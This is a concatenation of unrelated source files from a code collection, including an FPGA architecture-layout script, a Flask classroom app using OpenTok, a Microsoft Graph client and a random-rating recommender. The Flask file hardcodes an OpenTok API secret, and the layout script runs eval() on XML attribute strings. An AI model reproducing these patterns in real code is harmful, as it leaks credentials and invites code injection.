The FASM prefix pattern is provided with the --fasm_prefix parameter. The
pattern string may contain tag references that are replaced with tile specific
data. Tags have to be provided in curly brackets. The recognized tags are:
- 'tile' : tile type name
- 'sub_tile' : Sub-tile type name
- 'x' : X location in the VPR grid
- 'y' : Y location in the VPR grid
- 'z' : Z location in the VPR grid (cumulative sub-tile index)
- 'i' : Sub-tile index
- 'side' : Fabric side suffix. Takes one of the following: "_left", "_top"
"_right" or "_bottom". Empty string for non-side tiles and for
grid corners.
- 'site[N]' : Name of the N-th equivalent site of a sub-tile
For convenience the pattern string may also use simple math expressions to e.g.
transform the grid coordinates. For an expression to be evaluated it has to
be given in square brackets (see the rendering sketch after this docstring).
An example of a pattern that uses tags:
"TILE_{tile}_X{x}Y{y}"
An example of a pattern that transforms the X coordinate:
"{tile}_X[{x}+10]Y{y}"
"""
import argparse
import re
import itertools
import sys
import lxml.etree as ET
# =============================================================================
# Empty tile name
EMPTY = "EMPTY"
# =============================================================================
class GridLocSpec:
"""
Grid location specification construct that corresponds to VPR grid location tags:
https://docs.verilogtorouting.org/en/latest/arch/reference/#grid-location-tags
"""
PARAMS = (
("x", None),
("y", None),
("startx", "0"),
("starty", "0"),
("endx", "W-1"),
("endy", "H-1"),
("incrx", "w"),
("incry", "h"),
)
def __init__(self, xml_elem, tile_types):
# Get the grid dimensions
xml_parent = xml_elem.getparent()
grid_w = int(xml_parent.attrib["width"])
grid_h = int(xml_parent.attrib["height"])
# Common fields
self.type = xml_elem.tag
self.tile = xml_elem.attrib["type"]
self.priority = int(xml_elem.attrib["priority"])
self.xml_metadata = None
# Get the tile size
self.tile_w, self.tile_h = tile_types[self.tile][0:2]
# Optional fields but common to many constructs
globs = {"W": grid_w, "H": grid_h, "w": self.tile_w, "h": self.tile_h}
params = {}
for param, default in self.PARAMS:
s = xml_elem.attrib.get(param, default)
if s is not None:
params[param] = int(eval(s, {'__builtins__':None}, globs))
# "fill"
if xml_elem.tag == "fill":
self.locs = set(
[loc for loc in itertools.product(
range(0, grid_w, self.tile_w),
range(0, grid_h, self.tile_h)
)]
)
# "corners"
elif xml_elem.tag == "corners":
self.locs = set([
(0, 0,),
(grid_w - self.tile_w, 0),
(0, grid_h - self.tile_h),
(grid_w - self.tile_w, grid_h - self.tile_h)
])
# "perimeter"
elif xml_elem.tag == "perimeter":
self.locs = set()
for x in range(0, grid_w, self.tile_w):
self.locs.add((x, 0,))
self.locs.add((x, grid_h - self.tile_h,))
for y in range(self.tile_h, grid_h - self.tile_h, self.tile_h):
self.locs.add((0, y))
self.locs.add((grid_w - self.tile_w, y))
# "region"
elif xml_elem.tag == "region":
# TODO: Support repeatx and repeaty
assert "repeatx" not in xml_elem.attrib, "'repeatx' not supported"
assert "repeaty" not in xml_elem.attrib, "'repeaty' not supported"
self.locs = set(
[(x, y,) for x, y in itertools.product(
range(params["startx"], params["endx"] + 1, params["incrx"]),
range(params["starty"], params["endy"] + 1, params["incry"])
)]
)
# "row"
elif xml_elem.tag == "row":
# TODO: Support incry
assert "incry" not in xml_elem.attrib, "'incry' not supported"
self.locs = set([
(x, params["starty"],) for x in range(params["startx"], grid_w)
])
# "col"
elif xml_elem.tag == "col":
# TODO: Support incrx
assert "incrx" not in xml_elem.attrib, "'incrx' not supported"
self.locs = set([
(params["startx"], y) for y in range(params["starty"], grid_h)
])
# "single"
elif xml_elem.tag == "single":
self.locs = set(((params["x"], params["y"],),))
# For "single" store its original metadata
self.xml_metadata = xml_elem.find("metadata")
else:
assert False, "Unknown grid location spec '{}'".format(xml_elem.tag)
# =============================================================================
def dump_tile_grid(grid, file=sys.stdout):
"""
A debugging function. Dumps the tile (block) grid as ASCII text.
"""
print("Tile grid:", file=file)
xmax = max([loc[0] for loc in grid])
ymax = max([loc[1] for loc in grid])
for y in range(ymax + 1):
l = " {:>2}: ".format(y)
for x in range(xmax + 1):
loc = (x, y,)
if loc not in grid:
l += '.'
else:
tile_type = grid[loc]
if tile_type == EMPTY:
l += '.'
else:
l += tile_type[0].upper()
print(l, file=file)
def assemble_grid(gridspec_list):
"""
Assembles the tile grid from multiple GridLocSpec objects
"""
# Sort by priority
gridspec_list = sorted(gridspec_list, key=lambda item: item.priority)
# Assemble the grid
grid = {}
for gridspec in gridspec_list:
for loc in gridspec.locs:
# Clear the tile area in case it has width and/or height > 1
if gridspec.tile_w > 1 or gridspec.tile_h > 1:
for x, y in itertools.product(
range(gridspec.tile_w),
range(gridspec.tile_h)):
l = (loc[0] + x, loc[1] + y)
grid[l] = EMPTY
# Base tile location
grid[loc] = gridspec.tile
# Dump the grid
dump_tile_grid(grid, sys.stderr)
return grid
def process_fixed_layout(xml_layout, tile_types, sub_tile_prefix, args):
"""
Processes a fixed layout. Converts it to a layout consisting only of
"single" tiles.
"""
print("Processing fixed layout '{}' ...".format(xml_layout.attrib["name"]),
file=sys.stderr)
# Decode grid location specifications
grid_spec = []
for xml_elem in xml_layout:
if xml_elem.tag is not ET.Comment:
grid_spec.append(GridLocSpec(xml_elem, tile_types))
# Assemble the tile grid
grid = assemble_grid(grid_spec)
# Determine the grid extent
xs = set(loc[0] for loc in grid)
ys = set(loc[1] for loc in grid)
xmin = min(xs)
xmax = max(xs)
ymin = min(ys)
ymax = max(ys)
# "prefix only", "no prefix" lists
if args.prefix_only is not None:
prefix_only = set(args.prefix_only.split(","))
else:
prefix_only = set(tile_types.keys())
if args.no_prefix is not None:
no_prefix = set(args.no_prefix.split(","))
else:
no_prefix = set()
# Math equation evaluation function
def math_eval(match):
return str(eval(match.group(1), {'__builtins__':None}, {}))
# Write layout
xml_layout_new = ET.Element("fixed_layout", attrib=xml_layout.attrib)
keys = sorted(list(grid.keys()))
for loc in keys:
tile_type = grid[loc]
# Skip EMPTY tiles, in VPR tiles are empty by default
if tile_type == EMPTY:
continue
# Determine FPGA grid side
side = ""
if loc[0] == xmin and loc[1] > ymin and loc[1] < ymax:
side = "_left"
if loc[0] == xmax and loc[1] > ymin and loc[1] < ymax:
side = "_right"
if loc[1] == ymin and loc[0] > xmin and loc[0] < xmax:
side = "_bottom"
if loc[1] == ymax and loc[0] > xmin and loc[0] < xmax:
side = "_top"
# Create a new "single" tag
xml_single = ET.Element("single", attrib = {
"type": tile_type,
"x": str(loc[0]),
"y": str(loc[1]),
"priority": "10" # FIXME: Arbitrary
})
# Append metadata
if args.fasm_prefix is not None:
if tile_type in prefix_only and tile_type not in no_prefix:
sub_tiles = tile_types[tile_type][2]
fasm_prefixes = []
# Make prefix for each sub-tile
z = 0
for sub_tile_type, capacity, equivalent_sites in sub_tiles:
for i in range(capacity):
# Basic tags
tags = {
"tile": tile_type,
"sub_tile": sub_tile_type,
"x": str(loc[0]),
"y": str(loc[1]),
"z": str(z),
"i": str(i),
"side": side,
"site": equivalent_sites,
}
# Render the FASM prefix template
fasm_prefix = args.fasm_prefix.format(**tags)
# Check if we need to add another prefix for the
# sub-tile
if sub_tile_type in sub_tile_prefix:
fasm_prefix += "."
fasm_prefix += sub_tile_prefix[sub_tile_type].format(**tags)
# Evaluate equations
fasm_prefix = re.sub(r"\[([0-9+\-*/%]+)\]",
math_eval, fasm_prefix)
fasm_prefixes.append(fasm_prefix)
z = z + 1
# Create and append the XML tag
xml_metadata = ET.Element("metadata")
xml_meta = ET.Element("meta", attrib={"name": "fasm_prefix"})
xml_meta.text = " ".join(fasm_prefixes)
xml_metadata.append(xml_meta)
xml_single.append(xml_metadata)
xml_layout_new.append(xml_single)
return xml_layout_new
def process_layouts(xml_layout, tile_types, args):
"""
Processes grid layouts
"""
# Parse format strings for sub-tile prefixes
sub_tile_prefix = {}
for spec in args.sub_tile_prefix:
parts = spec.strip().split("=")
assert len(parts) == 2, spec
sub_tile_prefix[parts[0]] = parts[1]
# Look for "fixed_layout" and process them
for xml_elem in list(xml_layout):
if xml_elem.tag == "fixed_layout":
xml_layout_new = process_fixed_layout(
xml_elem, tile_types, sub_tile_prefix, args)
xml_layout.remove(xml_elem)
xml_layout.append(xml_layout_new)
# =============================================================================
def parse_tiles(xml_tiles):
"""
Read tile sizes (width and height) and sub-tile counts
"""
tile_types = {}
# A helper function for getting all equivalent sites
def get_equivalent_sites(xml_parent):
# the "equivalent_sites" tag
xml_equiv = xml_parent.find("equivalent_sites")
assert xml_equiv is not None
# List sites
return [item.attrib["pb_type"] for item in xml_equiv.findall("site")]
# Process all "tile" tags
for xml_tile in xml_tiles.findall("tile"):
name = xml_tile.attrib["name"]
width = int(xml_tile.attrib.get("width", "1"))
height = int(xml_tile.attrib.get("height", "1"))
# Process sub-tile tags
sub_tiles = []
for xml_sub_tile in xml_tile.findall("sub_tile"):
sub_name = xml_sub_tile.attrib["name"]
sub_count = int(xml_sub_tile.get("capacity", "1"))
sites = get_equivalent_sites(xml_sub_tile)
sub_tiles.append((sub_name, sub_count, sites,))
# No sub-tiles, assume that the tile is not heterogeneous
if not sub_tiles:
count = int(xml_tile.get("capacity", "1"))
sites = get_equivalent_sites(xml_tile)
sub_tiles = [(name, count, sites)]
tile_types[name] = (width, height, tuple(sub_tiles),)
# Add entry for the EMPTY tile
tile_types[EMPTY] = (1, 1, (EMPTY, 1,),)
return tile_types
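# Illustrative result (hypothetical tile): a width-1, height-2 "BRAM" tile with one
# sub-tile "BRAM_SLICE" of capacity 2 and a single equivalent site "bram_site" yields
# tile_types["BRAM"] == (1, 2, (("BRAM_SLICE", 2, ["bram_site"]),))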
# =============================================================================
def main():
# Parse arguments
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument(
"--arch-in",
type=str,
required=True,
help="VPR arch.xml input"
)
parser.add_argument(
"--arch-out",
type=str,
default=None,
help="VPR arch.xml output"
)
parser.add_argument(
"--fasm_prefix",
type=str,
default=None,
help="A template string for FASM prefix (def. None)"
)
parser.add_argument(
"--sub-tile-prefix",
type=str,
default=[],
nargs="+",
help="Template strings for sub-tile FASM prefixes (<sub_tile>=<prefix_fmt>) (def. None) "
)
parser.add_argument(
"--prefix-only",
type=str,
default=None,
help="A comma separated list of tile types to be prefixed"
)
parser.add_argument(
"--no-prefix",
type=str,
default=None,
help="A comma separated list of tile types NOT to be prefixed"
)
args = parser.parse_args()
# Read and parse the XML techfile
xml_tree = ET.parse(args.arch_in, ET.XMLParser(remove_blank_text=True))
xml_arch = xml_tree.getroot()
assert xml_arch is not None and xml_arch.tag == "architecture"
# Get tiles
xml_tiles = xml_arch.find("tiles")
assert xml_tiles is not None
# Get tile sizes
tile_types = parse_tiles(xml_tiles)
# Get layout
xml_layout = xml_arch.find("layout")
assert xml_layout is not None
# Process the layout
process_layouts(xml_layout, tile_types, args)
# Write the modified architecture file back
xml_tree = ET.ElementTree(xml_arch)
xml_tree.write(
args.arch_out,
pretty_print=True,
encoding="utf-8"
)
# =============================================================================
if __name__ == "__main__":
main()
| 2.71875
| 3
|
db/fdependency.py
|
ContentsViewer/Python-stdlib
| 0
|
12780058
|
<gh_stars>0
class FDependency:
"""
Functional dependency class
Example:
fd1 = FDependency(['A','B'],['C'])
fd2 = FDependency(['B'],['D'])
fd3 = FDependency(['A','B','E'],['C','D'])
fd4 = FDependency(['C','D'],['E'])
fd5 = FDependency(['C','E'],['A'])
"""
def __init__(self, lh, rh):
self.lh = lh
self.rh = rh
def __str__(self):
return str(self.lh) + ' -> ' + str(self.rh)
def __eq__(self, other):
return set(self.lh) == set(other.lh) and set(self.rh) == set(other.rh)
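# Illustrative usage (mirrors the examples in the class docstring):
# print(FDependency(['A', 'B'], ['C'])) # -> ['A', 'B'] -> ['C']
# FDependency(['A', 'B'], ['C']) == FDependency(['B', 'A'], ['C']) # -> True (comparison is set-based)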
| 3.28125
| 3
|
UserAuthentication/starter_code_4_views/src/core/forms.py
|
johangenis/intermediate-django-concepts
| 0
|
12780059
|
<filename>UserAuthentication/starter_code_4_views/src/core/forms.py
from django import forms
# from django.conf import settings
from django.contrib.auth import get_user_model
# settings.AUTH_USER_MODEL
User = get_user_model()
class UserRegisterForm(forms.ModelForm):
class Meta:
model = User
fields = [
"username",
"email",
"password",
]
| 1.765625
| 2
|
src/microsoft_graph/base.py
|
KaiWalter/family-board-py
| 0
|
12780060
|
import logging
import requests
from injector import inject
import app_config
from microsoft_graph import MicrosoftGraphAuthentication
class MicrosoftGraph:
@inject
def __init__(self, authentication_handler: MicrosoftGraphAuthentication):
self.authentication_handler = authentication_handler
def query(self, url, additional_headers=None):
self.__update_token()
result = None
if self.token:
headers = {
'Authorization': f'{self.token["token_type"]} {self.token["access_token"]}'
}
if additional_headers:
headers.update(additional_headers)
result = requests.get(url, headers=headers)
return result
def __update_token(self):
self.token = None
self.token = self.authentication_handler.get_token_from_cache()
if not self.token:
logging.error('token not updated')
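# Illustrative usage (a sketch; assumes an Injector instance wired with a working
# MicrosoftGraphAuthentication that has a cached token):
# graph = injector_instance.get(MicrosoftGraph)
# response = graph.query('https://graph.microsoft.com/v1.0/me')
# if response is not None and response.ok:
#     print(response.json())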
| 2.484375
| 2
|
main.py
|
sammysamau/remoteclassroom
| 3
|
12780061
|
<gh_stars>1-10
import os
import cgi
import uuid
from google.appengine.ext import ndb
from flask import Flask, render_template, redirect, session, request, make_response, url_for
from datetime import datetime, timedelta
import json
import logging
from common import app, p, getStudents, getMeetings, getStudent, pusher_key_config
from model import Log, Student, Course
from hashids import Hashids
from counter import increment, get_count
from common import feedUpdated, configChanged, generate_color, generate_user_id
import admin
import lti
import pusherauth
import snap
import urllib
from opentok import OpenTok, MediaModes
from pylti.common import LTI_SESSION_KEY
import settings
from canvas_read import CanvasReader
DEFAULT_COURSE_PREFIX = 'remoteclassschool'
OPENTOK_API_KEY = '46055162'
OPENTOK_API_SECRET = '29da2d1de1fdb09d35bf8a8b30167604e97f67f5'
'''
@app.route("/class")
def show_class():
link = Link.get_by_id('class_link')
if link == None:
return redirect("/")
return redirect(link.link)
@app.route("/classroom")
def show_classroom():
link = Link.get_by_id('class_link')
if link == None:
return redirect("/")
return redirect(link.link + "?sl=")
@app.route("/slide")
def show_slide():
link = Link.get_by_id('slide_link')
return redirect(link.link)
@app.route("/quiz")
def show_quiz():
quizLink = app.config.get('features')['quiz']['redirectLink']
return redirect(quizLink)
@app.route("/changeclassroom")
def show_admin_change_classlink():
link = Link.get_by_id('class_link')
jsonconfig = json.dumps(app.config.get('config'))
return render_template('admin/classroom_link.html', jsconfig=jsonconfig, classlink=link)
@app.route("/changeslide")
def show_admin_change_slidelink():
link = Link.get_by_id('slide_link')
jsonconfig = json.dumps(app.config.get('config'))
return render_template('admin/slide_link.html', jsconfig=jsonconfig, slidelink=link)
def go_to_student(studentId):
student = getStudent(studentId)
if student is not None:
return redirect(student['skypeMeeting'])
return redirect("/")
@app.route("/changeclassroom", methods=['POST'])
def trigger_changeclassroom():
classlink = cgi.escape(request.form['classlink'])
link = Link.get_or_insert('class_link', link=classlink)
link.link = classlink
link.put()
return redirect("/changeclassroom")
@app.route("/changeslide", methods=['POST'])
def trigger_changeslide():
slidelink = cgi.escape(request.form['slidelink'])
link = Link.get_or_insert('slide_link', link=slidelink)
link.link = slidelink
link.put()
return redirect("/changeslide")
'''
@app.route("/")
def show_index():
return render_template('www/index.html')
@app.route("/test")
def show_test():
return render_template('test.html')
@app.route("/main")
def main():
return render_template('main.html')
@app.route('/create', methods=['GET', 'POST'])
def create():
if request.method == 'POST':
content = request.get_json(silent=True)
fullName = cgi.escape(content['username'])
className = cgi.escape(content['classname'])
hashids = Hashids(salt=settings.HASHID_SALT,min_length=6)
increment()
count = get_count()
hashid = hashids.encode(count)
courseId = DEFAULT_COURSE_PREFIX + hashid
userId = request.cookies.get('remote_userid') if 'remote_userid' in request.cookies else generate_user_id()
userColor = request.cookies.get('remote_usercolor') if 'remote_usercolor' in request.cookies else generate_color()
host = app.config.get('host')
resp = make_response(hashid)
# Add course to database
key = courseId
course = Course.get_or_insert(key, courseId=courseId, teacherName=fullName)
course.put()
# Add teacher to course
# Create OpenTok session
opentok_sdk = OpenTok(OPENTOK_API_KEY, OPENTOK_API_SECRET)
# use tokbox server to route media streams;
# if you want to use p2p - change media_mode to MediaModes.relayed
opentok_session = opentok_sdk.create_session(media_mode = MediaModes.routed)
opentok_token = opentok_sdk.generate_token(opentok_session.session_id)
key = courseId + userId
user = Student.get_or_insert(key,
courseId = courseId,
studentId = userId,
fullName = fullName,
color = userColor,
role = 'TEACHER',
opentokSessionId = opentok_session.session_id,
opentokToken = opentok_token
)
user.put()
# Set user cookies (teacher role)
auth = json.loads(request.cookies.get('remote_auth')) if 'remote_auth' in request.cookies else {}
auth[hashid] = {
'role': 'Instructor',
'opentok_api_key': OPENTOK_API_KEY,
'opentok_session_id': user.opentokSessionId,
'opentok_token': user.opentokToken
}
resp.set_cookie('remote_userfullname', fullName)
resp.set_cookie('remote_auth', json.dumps(auth))
resp.set_cookie('remote_userid', userId)
resp.set_cookie('remote_usercolor', userColor)
#resp.set_cookie('remote_userinitials', userInitials)
return resp
return redirect('/main#/create')
@app.route('/join', methods=['POST'])
def join():
content = request.get_json(silent=True)
hashid = cgi.escape(content['hashid'])
fullName = cgi.escape(content['username'])
userId = request.cookies.get('remote_userid') if 'remote_userid' in request.cookies else generate_user_id()
userColor = request.cookies.get('remote_usercolor') if 'remote_usercolor' in request.cookies else generate_color()
resp = make_response(hashid)
# Ensure course exists
courseId = DEFAULT_COURSE_PREFIX + hashid
course = ndb.Key('Course', courseId).get()
# Add user to course
key = courseId + userId
user = Student.get_or_insert(key, courseId=courseId, studentId=userId, fullName=fullName, color=userColor)
userInitials = user.initials
user.put()
if not user.opentokSessionId:
opentok_sdk = OpenTok(OPENTOK_API_KEY, OPENTOK_API_SECRET)
# use tokbox server to route media streams;
# if you want to use p2p - change media_mode to MediaModes.relayed
opentok_session = opentok_sdk.create_session(media_mode = MediaModes.routed)
opentok_token = opentok_sdk.generate_token(opentok_session.session_id)
user.opentokSessionId = opentok_session.session_id
user.opentokToken = opentok_token
user.put()
teacher = Student.get_teacher_by_course(courseId)
# Set user cookies (student role)
auth = json.loads(request.cookies.get('remote_auth')) if 'remote_auth' in request.cookies else {}
auth[hashid] = {
'role': 'Student',
'opentok_api_key': OPENTOK_API_KEY,
'opentok_session_id': user.opentokSessionId,
'opentok_token': user.opentokToken,
'teacher_session_id': teacher.opentokSessionId,
'teacher_token': teacher.opentokToken
}
resp.set_cookie('remote_userfullname', fullName)
resp.set_cookie('remote_auth', json.dumps(auth))
resp.set_cookie('remote_userid', userId)
resp.set_cookie('remote_usercolor', userColor)
resp.set_cookie('remote_userinitials', userInitials)
configChanged(courseId, 'config', 'users')
return resp
@app.route("/<launch_id>")
def launch_by_id(launch_id):
#session['course_id'] = launch_id
#classSkype = ndb.Key('Setting', session['course_id'] + 'classSkype').get()
#iframeUrl = ndb.Key('Setting', session['course_id'] + 'iframeUrl').get()
jsonconfig = {
'PUSHER_APP_KEY': json.dumps(pusher_key_config['PUSHER_APP_KEY']).replace('"', ''),
#'iframeUrl': json.dumps(iframeUrl.value).replace('"', '') if iframeUrl else '',
#'classSkype': json.dumps(classSkype.value).replace('"', '') if classSkype else ''
}
# Lookup course id
courseId = DEFAULT_COURSE_PREFIX + launch_id
course = ndb.Key('Course', courseId).get()
if not course:
return "Error: No such course code"
courseName = course.courseName
teacherName = course.teacherName
if 'remote_auth' not in request.cookies:
return redirect('/main?launch=' + launch_id + '&name=' + urllib.quote(courseName) + '&teacher=' + urllib.quote(teacherName) + ' #join')
auth = json.loads(request.cookies.get('remote_auth'))
userId = request.cookies.get('remote_userid')
userColor = request.cookies.get('remote_usercolor')
fullName = request.cookies.get('remote_userfullname')
userInitials = request.cookies.get('remote_userinitials')
role = auth[launch_id]['role'] if launch_id in auth else ''
host = os.environ['HTTP_HOST']
protocol = 'https' # if request.url.startswith('http://') else 'https'
opentok_session_id = auth[launch_id]['opentok_session_id'] if launch_id in auth else ''
opentok_token = auth[launch_id]['opentok_token'] if launch_id in auth else ''
if not role:
return redirect('/main?launch=' + launch_id + '&name=' + urllib.quote(courseName) + '&teacher=' + urllib.quote(teacherName) + ' #join')
session['opentok_session_id'] = opentok_session_id
# Setup fake LTI session
session['full_name'] = fullName
session['guid'] = str(uuid.uuid4()) # Generate new UUID
session['course_id'] = courseId
session['user_id'] = userId
session['user_color'] = userColor
session['user_initials'] = userInitials
session['host'] = host
#session['user_image'] = request.form.get('user_image')
session[LTI_SESSION_KEY] = True
session['oauth_consumer_key'] = settings.CONSUMER_KEY
jsonsession = {
#'guid': session['guid'],
'course_id': DEFAULT_COURSE_PREFIX + launch_id,
'course_name': course.courseName,
'course_apps': course.courseApps,
'user_id': userId, #session['user_id'],
'full_name': fullName,
'user_color': userColor,
'user_initials': userInitials,
'host': host,
#'user_image': session['user_image'],
'role': role,
'opentok_api_key': OPENTOK_API_KEY,
'opentok_session_id': opentok_session_id,
'opentok_token': opentok_token,
'launch_id': launch_id,
'protocol': protocol
}
if 'Instructor' in role:
session['roles'] = 'Instructor'
return render_template('admin.html', jsconfig=json.dumps(jsonconfig), jssession=json.dumps(jsonsession))
else:
session['roles'] = 'Student'
jsonsession['opentok_teacher_session_id'] = auth[launch_id]['teacher_session_id']
jsonsession['opentok_teacher_token'] = auth[launch_id]['teacher_token']
return render_template('student.html', jsconfig=json.dumps(jsonconfig), jssession=json.dumps(jsonsession))
@app.route("/test-starter")
def show_starter():
host = app.config.get('host')
logging.info(request.view_args.items())
jsonconfig = {
'PUSHER_APP_KEY': json.dumps(pusher_key_config['PUSHER_APP_KEY']).replace('"', ''),
'iframeUrl': 'http://snap.berkeley.edu/snapsource/snap.html'
}
iframeUrl = ndb.Key('Setting', '1207667iframeUrl').get()
if (iframeUrl):
jsonconfig['iframeUrl'] = json.dumps(iframeUrl.value).replace('"', '')
jsonsession = {
'full_name': 'test',
'course_id': '1207667',
'user_id': 'asdasdas', #'8791939',
'role': 'Instructor'
}
student = ndb.Key('Student', jsonsession['course_id'] + jsonsession['user_id']).get()
return render_template('student.html', jsconfig=jsonconfig, jssession=jsonsession, host=host)
@app.route("/test-admin")
def show_adminn():
host = app.config.get('host')
jsonconfig = {
'PUSHER_APP_KEY': json.dumps(pusher_key_config['PUSHER_APP_KEY']).replace('"', ''),
'iframeUrl': 'http://snap.berkeley.edu/snapsource/snap.html',
'classSkype': 'https://meet.lync.com/microsoft/samelh/37BHT9O9'
}
jsonsession = {
'full_name': 'test'
}
return render_template('admin.html', jsconfig=jsonconfig, jssession=jsonsession, host=host)
'''
@app.route("/starter", methods=['POST'])
def get_starter_info():
studentId = cgi.escape(request.form['studentId'])
rewards = Log.get_by_type(studentId, 'reward')
weeklyrewards = Log.get_by_type_weekly(studentId, 'reward')
info = {}
info["totaltickets"] = rewards.count()
info["weeklytickets"] = weeklyrewards.count()
return json.dumps(info)
'''
if __name__ == "__main__":
app.run(debug=app.config.get('debug'))
| 2.125
| 2
|
generic_links/templatetags/generic_links_tags.py
|
johnbaldwin/django-generic-links
| 8
|
12780062
|
<reponame>johnbaldwin/django-generic-links
# -*- coding: utf-8 -*-
"""
Several useful template tags!
"""
from django import template
from generic_links import utils
register = template.Library()
class RelatedLinksNode(template.Node):
def __init__(self, context_var, obj, is_external):
self.context_var = context_var
self.obj_var = template.Variable(obj)
self.is_external = is_external
def render(self, context):
obj = self.obj_var.resolve(context)
context[self.context_var] = utils.get_links_for(obj).select_related("user").filter(is_external=self.is_external)
return u""
@register.tag
def get_links_for(parser, token):
"""
Usage: {% get_links_for <obj> as <some_var> %}
"""
bits = token.split_contents()
if len(bits) != 4:
message = "'%s' tag requires three arguments" % bits[0]
raise template.TemplateSyntaxError(message)
return RelatedLinksNode(bits[3], bits[1], True)
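# Illustrative template usage (hypothetical 'article' context variable):
# {% load generic_links_tags %}
# {% get_links_for article as related_links %}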
| 2.265625
| 2
|
python/searching/interpolation.py
|
nikitanamdev/AlgoBook
| 191
|
12780063
|
<gh_stars>100-1000
# Interpolation search is an improved version of binary search for sorted, uniformly distributed data.
# Its average-case time complexity is O(log(log n)), compared to O(log n) for binary search
# (the worst case degrades to O(n) on heavily skewed data).
# Following is the code of interpolation search:
# Python program to implement interpolation search
#Variable naming:
"""
1) lys - our input array
2) val - the element we are searching for
3) index - the probable index of the search element. This is computed to be a higher value when val
is closer in value to the element at the end of the array (lys[high]), and lower when val
is closer in value to the element at the start of the array (lys[low])
4) low - the starting index of the array
5) high - the last index of the array"""
def InterpolationSearch(lys, val):
low = 0
high = (len(lys) - 1)
while low <= high and val >= lys[low] and val <= lys[high]:
index = low + int(((float(high - low) / ( lys[high] - lys[low])) * ( val - lys[low])))
if lys[index] == val:
return index
if lys[index] < val:
low = index + 1
else:
high = index - 1
return -1
print(InterpolationSearch([1,2,3,4,5,6,7,8], 6))
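# Worked example for the call above: low=0, high=7, lys[low]=1, lys[high]=8, val=6,
# so index = 0 + int((7/7.0) * (6-1)) = 5 and lys[5] == 6, hence 5 is printed.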
| 3.75
| 4
|
jft.py
|
isimluk/jft
| 0
|
12780064
|
<filename>jft.py
#!/bin/python3
from jft import connect
conn = connect()
print(conn)
| 1.601563
| 2
|
bluebottle/follow/admin.py
|
terrameijar/bluebottle
| 10
|
12780065
|
<gh_stars>1-10
from django.contrib.contenttypes.admin import GenericTabularInline
from bluebottle.follow.models import Follow
class FollowAdminInline(GenericTabularInline):
model = Follow
ct_fk_field = "instance_id"
readonly_fields = ['created', 'user']
fields = readonly_fields
extra = 0
can_delete = True
| 1.679688
| 2
|
src/connectivity/overnet/lib/stats/link.py
|
bootingman/fuchsia2
| 1
|
12780066
|
<gh_stars>1-10
#!/usr/bin/env python
# Copyright 2019 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import statsc
statsc.compile(
name='Link',
include='src/connectivity/overnet/lib/stats/link.h',
stats = [
statsc.Counter(name='incoming_packet_count'),
statsc.Counter(name='outgoing_packet_count'),
]
)
| 1.390625
| 1
|
semantic_aware_models/models/recommendation/random_recommender.py
|
ITAINNOVA/SAME
| 0
|
12780067
|
from semantic_aware_models.models.recommendation.abstract_recommender import AbstractRecommender
from semantic_aware_models.dataset.movielens.movielens_data_model import *
from surprise import NormalPredictor
from surprise.reader import Reader
from surprise.dataset import Dataset
import time
class RandomRecommender(AbstractRecommender):
""" Algorithm predicting a random rating based on the distribution of the training set, which is assumed to be normal. """
def __init__(self, ratings_file_path=None, separator=None):
super(AbstractRecommender, self).__init__()
# Create the recommendation input_model and configure its input parameters:
self.model = NormalPredictor()
self.rating_data_model = RatingDataModel(ratings_file_path=ratings_file_path, separator=separator)
self.separator = separator
def recommend(self, user_id, how_many):
"""
Recommends the best items for a specific user.
:param user_id: Id of the user to recommend.
:param how_many: Number of items that we recommend to the specific user.
:return: Id of the items that the recommender returns.
"""
# Items not seen by a specific user.
item_ids_not_seen_from_user = self.rating_data_model.get_item_ids_not_seen_from_user(user_id)
list_recommend = []
for item_id in item_ids_not_seen_from_user:
preference = self.estimate_preference(user_id, item_id)
list_recommend.append([item_id, preference])
print(item_id, ', ', preference)
list_recommend.sort(key=lambda x: x[1], reverse=True)
return list_recommend[:how_many]
def estimate_preference(self, user_id, item_id):
"""
Estimate the preference value by a specific user.
:param user_id: Id of the user to recommend.
:param item_id: Id of the item to recommend.
        :return: The estimated preference from the specific recommender.
"""
# train file:
df_ratings = self.rating_data_model.df_ratings
        # A reader is still needed but only the rating_scale param is required.
reader = Reader(rating_scale=(self.rating_data_model.get_min_preference(), self.rating_data_model.get_max_preference()))
train_data = Dataset(reader=reader)
# The columns must correspond to user id, item id and ratings (in that order).
raw_trainset = train_data.load_from_df(df_ratings[['user_id', 'item_id', 'rating']], reader)
trainset = train_data.construct_trainset(raw_trainset.raw_ratings)
# Train recommendation input_model:
self.model.fit(trainset)
return float(self.model.estimate(u=user_id, i=item_id)[0])
def recommend_rival(self, n_folds, train_test_file_path, reader, recommendation_file_path):
"""
Prepare the predictions to take them to RiVaL Toolkit.
:param n_folds: Number of folds.
:param train_test_file_path: Path with train and input_test files.
:param recommendation_file_path: Path where the suitable files to run RiVaL Toolkit are saved.
:return: The suitable files to run RiVaL Toolkit are saved.
"""
for i in range(n_folds):
print('Fold: ', i)
timestart = time.time()
# train file:
train_file_name = train_test_file_path + 'train_bin_verified_sep_' + str(i) + '.csv'
train_data = Dataset(reader=reader)
raw_trainset = train_data.read_ratings(file_name=train_file_name)
trainset = train_data.construct_trainset(raw_trainset)
timeend = time.time()
print('Train file loading time: ', (timeend - timestart), 'seconds')
timestart = time.time()
# Train recommendation input_model:
self.model.fit(trainset)
timeend = time.time()
print('Training time: ', (timeend - timestart), 'seconds')
# input_test file:
timestart = time.time()
test_file_name = train_test_file_path + 'test_bin_verified_sep_' + str(i) + '.csv'
test_data = Dataset(reader=reader)
raw_testset = test_data.read_ratings(file_name=test_file_name)
testset = test_data.construct_testset(raw_testset)
timeend = time.time()
print('Load time of the input_test file: ', (timeend - timestart), 'seconds')
# Predictions:
timestart = time.time()
predictions = self.model.test(testset)
file_name = open(recommendation_file_path + 'recs_' + str(i) + '.csv', 'w')
for pred in predictions:
user_id = pred[0]
item_id = pred[1]
rating_real = pred[2]
rating_estimated = pred[3]
file_name.write(user_id + "\t" + item_id + "\t" + str(rating_estimated) + '\n')
            file_name.close()
            timeend = time.time()
print('Prediction time: ', (timeend - timestart), 'seconds')
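def _example_usage():
    # Hedged sketch (added for illustration, not called anywhere): the ratings file
    # path and tab separator below are assumptions about the MovieLens-style input
    # this class expects.
    recommender = RandomRecommender(ratings_file_path='ratings.csv', separator='\t')
    return recommender.recommend(user_id=1, how_many=10)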
| 2.859375
| 3
|
pytorch/MP_module_hard_soft.py
|
zwxu064/MPLayers
| 10
|
12780068
|
